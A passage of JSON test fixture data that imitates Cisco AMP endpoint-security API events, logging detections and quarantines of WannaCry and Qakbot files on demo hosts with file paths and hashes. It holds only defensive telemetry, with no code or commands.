Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610633340,"start_date":"2021-01-14T14:09:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c3eea0c27244f91cce86d57aca2b3f8d09f1dbd6274751226c6b09398a7ba4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":611000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772016730014000,"timestamp":1610631960,"timestamp_nanoseconds":65000000,"date":"2021-01-14T13:46:00+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772016730013699","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b","sha1":"5058b16a86beee96927371210b9a9f682976a50a","md5":"48a0bf05b9706a00d2a0ff6260412f11"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine 